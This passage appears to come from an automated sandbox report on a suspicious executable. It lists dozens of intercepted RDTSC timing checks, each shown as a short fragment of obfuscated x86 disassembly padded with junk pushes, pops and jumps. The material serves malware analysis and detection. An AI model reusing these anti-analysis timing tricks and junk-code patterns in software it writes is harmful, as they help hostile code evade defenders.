                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181080 second address: 11810AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCC94D4Dh 0x00000007 jmp 00007F7ADCC94D59h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11810AA second address: 11810B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DCA4C second address: 11DCA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DCA50 second address: 11DCA54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0EB0 second address: 11E0EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E00E8 second address: 11E00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2EE1 second address: 11E2EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2EE5 second address: 11E2EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E6B16 second address: 11E6B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCC94D4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jng 00007F7ADCC94D46h 0x00000013 jns 00007F7ADCC94D46h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E6B39 second address: 11E6B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F7ADCB94CD5h 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E6B57 second address: 11E6B75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F7ADCC94D54h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EC6F7 second address: 11EC6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0420 second address: 11F0449 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7ADCC94D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jmp 00007F7ADCC94D4Fh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F7ADCC94D46h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0449 second address: 11F044D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F044D second address: 11F0453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0453 second address: 11F0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F7ADCB94CD2h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0479 second address: 11F04A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007F7ADCC94D59h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F05F0 second address: 11F0613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCB94CD6h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CDA30 second address: 11CDA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CDA34 second address: 11CDA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F06CF second address: 1021B4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 2CE0A5FEh 0x0000000e jmp 00007F7ADCC94D4Ch 0x00000013 push dword ptr [ebp+122D0D35h] 0x00000019 jmp 00007F7ADCC94D57h 0x0000001e call dword ptr [ebp+122D300Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1AF9h], edx 0x0000002b xor eax, eax 0x0000002d pushad 0x0000002e mov ebx, 32939EE0h 0x00000033 mov si, bx 0x00000036 popad 0x00000037 xor dword ptr [ebp+122D1AF9h], edi 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007F7ADCC94D59h 0x00000046 mov dword ptr [ebp+122D2A55h], eax 0x0000004c cld 0x0000004d mov esi, 0000003Ch 0x00000052 cld 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 stc 0x00000058 lodsw 0x0000005a sub dword ptr [ebp+122D1AF9h], edx 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 jc 00007F7ADCC94D4Eh 0x0000006a jl 00007F7ADCC94D48h 0x00000070 pushad 0x00000071 popad 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 stc 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F7ADCC94D50h 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F74A7 second address: 11F74B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F7ADCB94CDBh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F74B5 second address: 11F74CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCC94D4Fh 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6C0F second address: 11F6C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6C15 second address: 11F6C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6EFF second address: 11F6F0B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6F0B second address: 11F6F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F7ADCC94D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7ADCC94D4Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6F27 second address: 11F6F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F7ADCB94CCBh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6F38 second address: 11F6F5D instructions: 0x00000000 rdtsc 0x00000002 je 00007F7ADCC94D46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7ADCC94D51h 0x00000013 je 00007F7ADCC94D46h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6F5D second address: 11F6F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CD9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F70B6 second address: 11F70BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F70BC second address: 11F70C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F71E9 second address: 11F71F3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7ADCC94D46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F71F3 second address: 11F71FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F71FC second address: 11F7202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE916 second address: 11FE91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FEBE5 second address: 11FEBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FEBE9 second address: 11FEBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FEBF3 second address: 11FEC0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCC94D54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FF041 second address: 11FF057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CD2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FF057 second address: 11FF05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FF05D second address: 11FF077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CD5h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE6A1 second address: 11FE6A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FF5B5 second address: 11FF5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7ADCB94CC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1187AC8 second address: 1187AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 jng 00007F7ADCC94D46h 0x0000000d jmp 00007F7ADCC94D4Dh 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207D5A second address: 1207D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207D5E second address: 1207D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCC94D50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F7ADCC94D4Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207D87 second address: 1207D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206889 second address: 120689F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADCC94D52h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120689F second address: 12068A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206B22 second address: 1206B2C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206B2C second address: 1206B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206DF4 second address: 1206DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120724E second address: 1207254 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12073C4 second address: 12073C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12073C8 second address: 12073D2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7ADCB94CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12073D2 second address: 12073DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7ADCC94D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12073DC second address: 12073E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118CAC3 second address: 118CACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F7ADCC94D46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118CACF second address: 118CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207BA8 second address: 1207BAD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207BAD second address: 1207BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCB968D8h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207BCE second address: 1207C01 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7ADCEF9157h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F7ADCEF914Bh 0x00000013 jg 00007F7ADCEF9162h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C785A second address: 11C785E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C785E second address: 11C787F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C795E second address: 11C79C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F7ADCB968D0h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F7ADCB968CCh 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a pushad 0x0000001b jmp 00007F7ADCB968CEh 0x00000020 jmp 00007F7ADCB968D6h 0x00000025 popad 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jns 00007F7ADCB968C6h 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C79C3 second address: 11C79C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C79C7 second address: 11C79F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 sbb edx, 42CEC1F2h 0x0000000e call 00007F7ADCB968C9h 0x00000013 push ecx 0x00000014 jmp 00007F7ADCB968CAh 0x00000019 pop ecx 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C7E30 second address: 11C7E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007F7ADCEF9150h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8665 second address: 11C8689 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F7ADCB968D9h 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8689 second address: 11B019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F7ADCEF9148h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 sub ecx, dword ptr [ebp+122D2D4Dh] 0x00000029 mov edi, dword ptr [ebp+122D2C2Dh] 0x0000002f lea eax, dword ptr [ebp+12478FFFh] 0x00000035 push eax 0x00000036 jns 00007F7ADCEF914Eh 0x0000003c mov dword ptr [esp], eax 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F7ADCEF9148h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov cl, FDh 0x0000005b mov dh, BFh 0x0000005d call dword ptr [ebp+1244C83Ch] 0x00000063 push eax 0x00000064 push edx 0x00000065 jo 00007F7ADCEF9148h 0x0000006b push edx 0x0000006c pop edx 0x0000006d jmp 00007F7ADCEF9154h 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C551 second address: 120C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C55C second address: 120C562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C562 second address: 120C56E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F7ADCB968C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C97B second address: 120C980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C980 second address: 120C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C986 second address: 120C998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7ADCEF914Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C998 second address: 120C9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120CC8D second address: 120CC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120CC93 second address: 120CC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120CC98 second address: 120CCA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1210AB2 second address: 1210AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1213203 second address: 1213243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F7ADCEF914Ah 0x0000000b jmp 00007F7ADCEF9157h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007F7ADCEF914Eh 0x00000019 jns 00007F7ADCEF9146h 0x0000001f pop edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12133B7 second address: 12133BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121351D second address: 121353C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9159h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121353C second address: 121355A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7ADCB968CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7ADCB968CAh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121355A second address: 121355E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1215A06 second address: 1215A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1215A0C second address: 1215A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCEF914Ah 0x00000009 popad 0x0000000a js 00007F7ADCEF915Ch 0x00000010 jmp 00007F7ADCEF9156h 0x00000015 popad 0x00000016 pushad 0x00000017 push edx 0x00000018 jg 00007F7ADCEF9146h 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jns 00007F7ADCEF9146h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1215A4B second address: 1215A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121AC04 second address: 121AC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F7ADCEF9154h 0x0000000b jmp 00007F7ADCEF914Ah 0x00000010 jmp 00007F7ADCEF914Ah 0x00000015 popad 0x00000016 rdtsc
